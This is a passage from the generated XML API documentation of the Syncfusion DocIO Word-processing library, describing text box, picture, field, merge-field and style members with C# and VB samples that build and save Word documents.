            <value>The <see cref="T:Syncfusion.DocIO.DLS.TextWrappingType"/> member that specifies the wrapping type.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.TextBoxShapeID">
            <summary>
            Gets or sets texbox's shape identifier
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.LineWidth">
            <summary>
            Gets or sets the line width of the text box.
            </summary>
            <value>The <b>float</b> that specifies the line width.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.LineDashing">
            <summary>
            Gets or sets the line dashing style for the text box.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.LineDashing"/> member that specifies the line dashing style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.HorizontalAlignment">
            <summary>
            Gets or sets the horizontal alignment of the text box.
            </summary>
            <value><see cref="T:Syncfusion.DocIO.ShapeHorizontalAlignment"/> member that specifies the horizontal alignment.</value>
            <remarks>
            If the alignment is set as None, then the text box is explicitly positioned using position properties. 
            Otherwise it is positioned according to the alignment specified. The position of the object is relative to <see cref="P:Syncfusion.DocIO.DLS.WTextBoxFormat.HorizontalOrigin"/>.
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.VerticalAlignment">
            <summary>
            Gets or sets the vertical alignment of the text box.
            </summary>
            <value><see cref="T:Syncfusion.DocIO.ShapeVerticalAlignment"/> member that specifies the vertical alignment.</value>
            <remarks>
            If the alignment is set as None, then the text box is explicitly positioned using position properties. 
            Otherwise it is positioned according to the alignment specified. The position of the object is relative to <see cref="P:Syncfusion.DocIO.DLS.WTextBoxFormat.VerticalOrigin"/>.
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.TextVerticalAlignment">
            <summary>
            Gets or sets vertical alignment of the Text in textbox (DocX specific)
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.TextBoxIdentificator">
            <summary>
            Gets or sets textbox identifier;
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.IsHeaderTextBox">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.InternalMargin">
            <summary>
            Gets the internal margin for the text box.
            </summary>
            <value>The <see cref="P:Syncfusion.DocIO.DLS.WTextBoxFormat.InternalMargin"/> instance that specifies the margin values.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.FillEfects">
            <summary>
            Gets the background fill effects of the text box.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Background"/> instance that specifies the fill effects.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.AllowInCell">
            <summary>
            Gets or sets a value indicating whether allow textbox in cell.
            </summary>
            <value>if allow in cell, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.OrderIndex">
            <summary>
            Gets or sets the index of the order.
            </summary>
            <value>The index of the order.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.DocxStyleProps">
            <summary>
            Gets the docx style properties.
            </summary>
            <value>The docx style props.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.HasDocxProps">
            <summary>
            Gets a value indicating whether this instance has docx props.
            </summary>
            <value>
            	if this instance has docx props, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.AutoFit">
            <summary>
            Gets or set a value indicating whether the TextBox is sized automatically based on the contents.
            </summary>
            <value>
            <c>True</c>, if resize text box to fit the contents; otherwise <c>false</c>.</value>
            <remarks>
            The default value is <c>false</c>.
            </remarks>
            <example>
            <code language = "C#">
                //Creates a new Word document
                WordDocument document = new WordDocument();
                //Adds new section to the document
                IWSection section = document.AddSection();
                //Adds new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Appends new textbox to the paragraph
                IWTextBox textbox = paragraph.AppendTextBox(150, 50);
                //Adds new text to the textbox body
                IWParagraph textboxParagraph = textbox.TextBoxBody.AddParagraph();
                textboxParagraph.AppendText("Text inside text box text inside text box text inside text box.");
                //Resize the textbox based on its contents
                textbox.TextBoxFormat.AutoFit = true;
                //Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            </code>
            <code language ="VB">
                'Creates a new Word document
                Dim document As New WordDocument()
                'Adds new section to the document
                Dim section As IWSection = document.AddSection()
                'Adds new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Appends new textbox to the paragraph
                Dim textbox As IWTextBox = paragraph.AppendTextBox(150, 50)
                'Adds new text to the textbox body
                Dim textboxParagraph As IWParagraph = textbox.TextBoxBody.AddParagraph()
                textboxParagraph.AppendText("Text inside text box text inside text box text inside text box.")
                'Resize the textbox based on its contents
                textbox.TextBoxFormat.AutoFit = True
                'Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.WidthRelativePercent">
            <summary>
            Gets or sets the width relative percent.
            </summary>
            <value>The width relative percent.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.HeightRelativePercent">
            <summary>
            Gets or sets the height relative percent.
            </summary>
            <value>The height relative percent.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.HorizontalRelativePercent">
            <summary>
            Gets or sets the horizontal relative percent.
            </summary>
            <value>The horizontal relative percent.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.VerticalRelativePercent">
            <summary>
            Gets or sets the vertical relative percent.
            </summary>
            <value>The vertical relative percent.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.TextDirection">
            <summary>
            Gets or sets the text direction for the text box.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.TextDirection"/> member that specifies the text direction type.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.TextThemeColor">
            <summary>
            Gets/sets Text Theme color.
            </summary>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.DLS.WTextBoxFormat.AllowOverlap" -->
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.WrapPolygon">
            <summary>
            Gets or sets the wrap polygon.
            </summary>
            <value>
            The wrap polygon.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.DocxProps">
            <summary>
             Gets the additional docx properties.
            </summary>
            <value>The docx props.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.InternalMargin">
            <summary>    
            Represents the internal margin for the text box.
            </summary>
            <seealso cref="T:Syncfusion.DocIO.DLS.WTextBoxFormat"/>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.InternalMargin.m_intLeftMarg">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.InternalMargin.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.InternalMargin"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.InternalMargin.Clone">
            <summary>
            Clones this instance.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.InternalMargin.Left">
            <summary>
            Gets or sets the internal left margin (in points).
            </summary>
            <value>The <b>float</b> that specifies the internal left margin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.InternalMargin.Right">
            <summary>
            Gets or sets the internal right margin (in points).
            </summary>
            <value>The <b>float</b> that specifies the internal right margin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.InternalMargin.Top">
            <summary>
            Gets or sets the internal top margin (in points).
            </summary>
            <value>The <b>float</b> that specifies the internal top margin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.InternalMargin.Bottom">
            <summary>
            Gets or sets the internal bottom margin (in points).
            </summary>
            <value>The <b>float</b> that specifies the internal bottom margin.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WrapPolygon.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WrapPolygon"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WrapPolygon.Clone">
            <summary>
            Copy source wrapformat to destination wrapformat
            </summary>
            <param name="source"></param>
            <param name="destination"></param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WrapPolygon.Edited">
            <summary>
            Gets or sets a value indicating whether this <see cref="T:Syncfusion.DocIO.DLS.WrapPolygon"/> is edited.
            </summary>
            <value>
              <c>true</c> if edited; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WrapPolygon.Vertices">
            <summary>
            Gets or sets the vertices.
            </summary>
            <value>
            The vertices.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HtmlConverterFactory">
            <summary>
            Represents the implementation to get the <see cref="T:Syncfusion.DocIO.DLS.IHtmlConverter"/> instance.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HtmlConverterFactory.s_htmlConverter">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HtmlConverterFactory.GetInstance">
            <summary>
            Initializes the <see cref="T:Syncfusion.DocIO.DLS.IHtmlConverter"/> object.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IHtmlConverter"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HtmlConverterFactory.Register(Syncfusion.DocIO.DLS.IHtmlConverter)">
            <summary>
            Registers the specified converter.
            </summary>
            <param name="converter">The <see cref="T:Syncfusion.DocIO.DLS.IHtmlConverter"/> object.</param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XmlTableFormat">
            <summary>
            Summary description for XmlTableFormat.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XmlTableFormat.#ctor(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.XmlTableFormat"/> class.
            </summary>
            <param name="owner">The owner.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XmlTableFormat.Clone(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Clones the specified owner table.
            </summary>
            <param name="ownerTable">The owner table.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XmlTableFormat.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XmlTableFormat.NodeArray">
            <summary>
            Gets the node array with unparsed table properties.
            </summary>
            <value>The node array.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XmlTableFormat.StyleName">
            <summary>
            Gets or sets the name of the table style.
            </summary>
            <value>The name of the style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XmlTableFormat.Format">
            <summary>
            Gets the format.
            </summary>
            <value>The format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XmlTableFormat.HasFormat">
            <summary>
            Gets a value indicating whether this instance has format.
            </summary>
            <value>
            	if this instance has format, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XmlTableFormat.Owner">
            <summary>
            Gets the owner.
            </summary>
            <value>The owner.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IDocumentCollection">
            <summary>
            Represents a collection of <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> objects.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IDocumentCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> at the specified index.
            </summary>
            <param name="index">The zero-based index of the Word document to get</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> at the specified index</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid index in the <see cref="T:Syncfusion.DocIO.DLS.IDocumentCollection"/></exception>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWField">
            <summary>
            Represents a field.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWTextRange">
            <summary>
            Represents the text in the Word document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWTextRange.ApplyCharacterFormat(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Applies the specified character format to the text.
            </summary>
            <param name="charFormat">The <see cref="T:Syncfusion.DocIO.DLS.WCharacterFormat"/> to be applied to the text.</param>
            <example>The following example illustrates how to add a text to the document.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                document.EnsureMinimal();
                //Add new text
                IWTextRange text = document.LastParagraph.AppendText("Hello world");
                //Initialize character format
                WCharacterFormat characterformat = new WCharacterFormat(document);
                characterformat.Bold = true;
                characterformat.Italic = true;
                characterformat.TextColor = Color.Blue;
                //Apply character format
                text.ApplyCharacterFormat(characterformat);
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                document.EnsureMinimal()
                'Add new text
                Dim text As IWTextRange = document.LastParagraph.AppendText("Hello world")
                'Initialize character format
                Dim characterformat As New WCharacterFormat(document)
                characterformat.Bold = True
                characterformat.Italic = True
                characterformat.TextColor = Color.Blue
                'Apply character format
                text.ApplyCharacterFormat(characterformat)
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTextRange.Text">
            <summary>
            Gets or sets the text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTextRange.CharacterFormat">
            <summary>
            Gets the character format(font properties) of the text. Read-only.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWField.Update">
            <summary>
            Updates the field result for this <see cref="T:Syncfusion.DocIO.DLS.WField"/>.
            </summary>
            <remarks>
            <para>Essential DocIO currently support the updating of field result for the following field types only:</para>
            <list type="buttet">
            <item>= (formula field)</item>
            <item>DATE</item>
            <item>TIME</item>
            <item>DOCVARIABLE </item>
            <item>DOCPROPERTY</item>
            <item>COMPARE</item>
            <item>IF</item>
            <item>NEXTIF</item>
            <item>MERGEREC</item>
            <item>MERGESEQ</item>
            <item>SECTION</item>
            <item>NUMPAGES</item>
            <item>TITLE</item>
            <item>Cross-Reference</item>
            </list>
            <para>Also while updating of NUMPAGES field and Cross Reference field with Page number and Paragraph number options are not supported in Silverlight, WinRT, Universal, Windows Phone and Xamarin applications.</para>
            <para>Currently group shapes, drawing canvas, and table auto resizing are not supported in Word to PDF lay outing, and this may lead to update incorrect page number and total number of pages.</para>
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWField.TextFormat">
            <summary>
            Gets or sets the text format field switch that defines how to display field results.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWField.FieldType">
            <summary>
            Gets or sets field type.
            </summary>
            <value>the <see cref="P:Syncfusion.DocIO.DLS.IWField.FieldType"/> represents the type of the field.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWField.FieldCode">
            <summary>
            Gets or sets the field code.
            </summary>
            <value>The field code information used to evaluate the resultant value of the field.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWMergeField">
            <summary>
            Represents a mail merge field.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWMergeField.FieldName">
            <summary>
            Gets or sets mail merge field name.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWMergeField.TextBefore">
            <summary>
            Gets or sets the text that is displayed before the merge field.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWMergeField.TextAfter">
            <summary>
            Gets or sets the text that is displayed after the merge field.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWMergeField.Prefix">
            <summary>
            Gets the prefix of merge field. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWMergeField.NumberFormat">
            <summary>
            Gets the number format of the merge field. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWMergeField.DateFormat">
            <summary>
            Gets the date format of the merge field. Read-only.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWPicture">
            <summary>
            Represents a picture in a word document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWPicture.LoadImage(System.Drawing.Image)">
            <summary>
            Loads the image from the specified <see cref="T:System.Drawing.Image"/> instance.
            </summary>
            <param name="image">The <see cref="T:System.Drawing.Image"/> instance.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin platforms.</remarks>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Initialize new picture
                WPicture picture = new WPicture(document);
                //Load image from the file
                picture.LoadImage(Image.FromFile("Image.png"));
                //Set width and height
                picture.Height = 100;
                picture.Width = 150;
                //Add picture to the paragraph
                paragraph.Items.Add(picture);
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Initialize new picture
                Dim picture As New WPicture(document)
                'Load image from the file
                picture.LoadImage(Image.FromFile("Image.png"))
                'Set width and height
                picture.Height = 100
                picture.Width = 150
                'Add picture to the paragraph
                paragraph.Items.Add(picture)
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWPicture.LoadImage(System.Byte[])">
            <summary>
            Loads the image from the specified byte array.
            </summary>
            <param name="imageBytes">The byte array that specifies the image as bytes.</param>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Get the image and convert to byte array
                Image image = Image.FromFile("Image.png");
                MemoryStream imageStream = new MemoryStream();
                image.Save(imageStream, System.Drawing.Imaging.ImageFormat.Png);
                byte[] imageBytes = imageStream.ToArray();
                //Initialize new picture
                WPicture picture = new WPicture(document);
                //Load image from the byte array
                picture.LoadImage(imageBytes);
                //Set width and height
                picture.Height = 100;
                picture.Width = 150;
                //Add picture to the paragraph
                paragraph.Items.Add(picture);
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Get the image and convert to byte array
                Dim image__1 As Image = Image.FromFile("Image.png")
                Dim imageStream As New MemoryStream()
                image__1.Save(imageStream, System.Drawing.Imaging.ImageFormat.Png)
                Dim imageBytes As Byte() = imageStream.ToArray()
                'Initialize new picture
                Dim picture As New WPicture(document)
                'Load image from the byte array
                picture.LoadImage(imageBytes)
                'Set width and height
                picture.Height = 100
                picture.Width = 150
                'Add picture to the paragraph
                paragraph.Items.Add(picture)
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWPicture.AddCaption(System.String,Syncfusion.DocIO.CaptionNumberingFormat,Syncfusion.DocIO.CaptionPosition)">
            <summary>
            Adds caption for the current picture with specified name, caption format and caption position.
            </summary>
            <param name="name">The <b>string </b>that specifies the name.</param> 
            <param name="format">The <see cref="T:Syncfusion.DocIO.CaptionNumberingFormat"/> member that specifies the format for caption numbering.</param>
            <param name="captionPosition">The <see cref="T:Syncfusion.DocIO.CaptionPosition"/> member that specifies the position of caption.</param>
            <returns>The paragraph instance with the specified caption.</returns>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("This paragraph has picture. ");
                //Append new picture to the paragraph
                IWPicture picture = paragraph.AppendPicture(Image.FromFile("Image.png"));            
                //Set width and height for the paragraph
                picture.Width = 150;
                picture.Height = 100;            
                //Set caption for picture
                picture.AddCaption("Figure 1.1", CaptionNumberingFormat.Number, CaptionPosition.AboveImage);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("This paragraph has picture. ")
                'Append new picture to the paragraph
                Dim picture As IWPicture = paragraph.AppendPicture(Image.FromFile("Image.png"))
                'Set width and height for the paragraph
                picture.Width = 150
                picture.Height = 100
                'Set caption for picture
                picture.AddCaption("Figure 1.1", CaptionNumberingFormat.Number, CaptionPosition.AboveImage)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.Height">
            <summary>
            Gets or sets the picture height in points
            </summary>
            <value>The <b>float</b> that specifies the height.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.Width">
            <summary>
            Gets or sets the picture width in points.
            </summary>
            <value>The <b>float</b> that specifies the width.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.HeightScale">
            <summary>
            Gets or sets the picture height scale factor in percent.
            </summary>
            <value>The <b>float</b> that specifies the height scale factor.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.WidthScale">
            <summary>
            Gets or sets the picture width scale factor in percent.
            </summary>
            <value>The <b>float</b> that specifies the width scale factor.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.Image">
            <summary>
            Gets the <see cref="T:System.Drawing.Image"/> instance that represents the picture. Read-only.
            </summary>
            <value>The <see cref="T:System.Drawing.Image"/> instance.</value>
            <remarks>This property is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.ImageBytes">
            <summary>
            Gets the image as byte array. Read-only.
            </summary>
            <value>The <see cref="T:System.Byte"/> array that represents image bytes.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.HorizontalOrigin">
            <summary>
            Gets or sets the horizontal origin of the picture.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HorizontalOrigin"/> member that specifies the horizontal origin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.VerticalOrigin">
            <summary>
            Gets or sets the vertical origin of the picture.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.VerticalOrigin"/> member that specifies the vertical origin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.HorizontalPosition">
            <summary>
            Gets or sets absolute horizontal position of the picture in points.
            </summary>
            <value>The <b>float </b> that specifies the horizontal position.</value>
            <remarks>
            The horizontal position is relative to the <see cref="P:Syncfusion.DocIO.DLS.WPicture.HorizontalOrigin"/>.
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.VerticalPosition">
            <summary>
            Gets or sets absolute vertical position of the picture in points.
            </summary>
            <value>The <b>float </b> that specifies the vertical position.</value>
            <remarks>
            The vertical position is relative to the <see cref="P:Syncfusion.DocIO.DLS.WPicture.VerticalOrigin"/>.
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.TextWrappingStyle">
            <summary>
            Gets or sets the text wrapping style of the picture.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.TextWrappingStyle"/> member that specifies the text wrapping style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.TextWrappingType">
            <summary>
            Gets or sets the text wrapping type of the picture.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.TextWrappingType"/> member that specifies the text wrapping type.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.IsBelowText">
            <summary>
            Gets or sets a value indicating whether the picture is below the text.
            </summary>
            <value><b>True </b>if the picture is below text; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.HorizontalAlignment">
            <summary>
            Gets or sets the horizontal alignment of the picture.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.ShapeHorizontalAlignment"/> member that specifies the horizontal alignment.</value>
            <remarks>
            If the alignment is set as None, then the picture is explicitly positioned using position properties. 
            Otherwise it is positioned according to the alignment specified. The position of the object is relative to <see cref="P:Syncfusion.DocIO.DLS.WPicture.HorizontalOrigin"/>.
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.VerticalAlignment">
            <summary>
            Gets or sets the vertical alignment of the picture.
            </summary>
            <remarks>
            If the alignment is set as None, then the picture is explicitly positioned using position properties. 
            Otherwise it is positioned according to the alignment specified. The position of the object is relative to <see cref="P:Syncfusion.DocIO.DLS.WPicture.VerticalOrigin"/>.
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.AlternativeText">
            <summary>
            Gets or sets the alternate text for the picture.
            </summary>
            <value>The <b>string</b> that represents the alternate text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.Name">
            <summary>
            Gets or sets the name of the picture.
            </summary>
            <value>The <b>string</b> that represents the name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.Title">
            <summary>
            Gets or sets the picture title.
            </summary>
            <value>The <b>string</b> that represents the title.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWPicture.Visible">
            <summary>
            Gets or sets a value indicating whether the picture is visible.
            </summary>
            <value>
              <b>True</b> if the picture is visible; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWTextBox">
            <summary>
            Represents the text box.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTextBox.Name">
            <summary>
            Gets or sets the name of the text box.
            </summary>
            <value>
            The <b>string</b> that represents the name.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTextBox.Visible">
            <summary>
            Gets or sets a value indicating whether this <see cref="T:Syncfusion.DocIO.DLS.WTextBox"/> is visible.
            </summary>
            <value>
              <b>True</b> if visible; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTextBox.ChildEntities">
            <summary>
            Gets the child elements of the text box. Read-only.
            </summary>
            <value>The collection of child elements.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTextBox.TextBoxBody">
            <summary>
            Gets the text body of the text box. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTextBox.TextBoxFormat">
            <summary>
            Gets or sets the text box format.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWCharacterStyle">
            <summary>
            Represents the style that can be used to format a characters inside the paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWCharacterStyle.IsPrimaryStyle">
            <summary>
            Gets or sets a value indicating whether this instance is primary style.
            </summary>
            <value>
            	if this instance is primary style, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWCharacterStyle.CharacterFormat">
            <summary>
            Gets formatting of characters inside paragraph.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWParagraphStyle">
            <summary>
            Represents the style that can be used to format a Paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWParagraphStyle.IsPrimaryStyle">
            <summary>
            Gets or sets a value indicating whether this instance is primary style.
            </summary>
            <value>
            	if this instance is primary style, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWParagraphStyle.ParagraphFormat">
            <summary>
            Gets formatting of paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWParagraphStyle.CharacterFormat">
            <summary>
            Gets formatting of characters inside paragraph.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWTableStyle">
            <summary>
            Represents the style of the <see cref="T:Syncfusion.DocIO.DLS.WTable"/>.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTableStyle.ParagraphFormat">
            <summary>
            Gets the paragraph format.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WParagraphFormat"/> object.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WAbsoluteTab">
            <summary>
            Represent a Absolute Tab.
            </summary>
        </member>
